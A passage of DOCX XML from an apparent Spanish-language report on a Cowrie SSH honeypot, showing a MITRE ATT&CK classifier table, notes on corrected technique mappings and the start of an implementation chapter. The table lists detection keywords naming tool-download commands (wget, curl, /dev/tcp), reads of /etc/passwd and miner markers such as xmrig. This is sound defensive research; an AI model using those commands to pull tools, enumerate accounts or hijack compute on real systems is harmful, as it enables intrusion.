        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1087.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Lectura de /etc/passwd y /etc/group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">System Owner/User Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1033</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">whoami, id, w, who, last</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Process Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1057</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ps, top, pgrep, pidof</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">System Network Configuration Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1016</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ifconfig, ip a, route, resolv.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">System Network Connections Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1049</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">netstat, ss, lsof -i</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">File and Directory Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1083</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ls, find /</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">wget, curl, tftp, ftpget, /dev/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Resource Hijacking: Compute Hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1496.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">xmrig, minerd, stratum+tcp, miner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla 5. Catálogo de técnicas MITRE ATT&amp;CK del clasificador.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Una versión anterior de esta tabla, elaborada a mano a partir de la literatura, incluía dos asignaciones que se corrigieron al construir el clasificador. Los intentos de autenticación se habían situado en la táctica Initial Access, cuando la fuerza bruta (T1110) pertenece a Credential Access; y las propias sesiones SSH se habían clasificado como movimiento lateral (T1021.004), cuando el honeypot es el punto de entrada del atacante y no una máquina desde la que se desplace hacia otras. Asimismo, el acceso con las credenciales de root se reasignó de Default Accounts (T1078.001) a Local Accounts (T1078.003).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La tabla con los datos reales (sesiones, IPs y ejemplos de cada técnica) la genera el analizador al procesar los logs de la captura, y se incorporará al informe de inteligencia junto con las recomendaciones defensivas asociadas a cada técnica.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Este capítulo describe cómo se ha construido el sistema: los scripts que llevan un servidor Ubuntu recién creado hasta un honeypot operativo, la configuración de Cowrie, los servicios de systemd, el script de análisis y la herramienta de aprovisionamiento desarrollada para intentar obtener la instancia en Oracle Cloud, la plataforma prevista inicialmente. Todo el código se encuentra en el repositorio del proyecto y los ficheros de configuración completos se reproducen en los anexos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Estrategia de Despliegue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El despliegue se ha dividido en tres scripts de Bash que se ejecutan en orden. La división no es arbitraria: cada script termina en un punto en el que el administrador debe comprobar algo antes de continuar, y un error en ese punto podría dejarle sin acceso al servidor. El riesgo principal del proyecto es precisamente ese: mover el SSH de administración y redirigir el puerto 22 son operaciones que, ejecutadas en mal orden, cortan el único canal de acceso a una máquina remota.</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794"/>
        <w:gridCol w:w="2302"/>
        <w:gridCol w:w="2620"/>
        <w:gridCol w:w="2223"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="500"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Paso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1450"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Función</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Comprobación previa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1450"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Consola del proveedor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cloud Firewall con entrada TCP 22, TCP 2022 e ICMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="500"/>
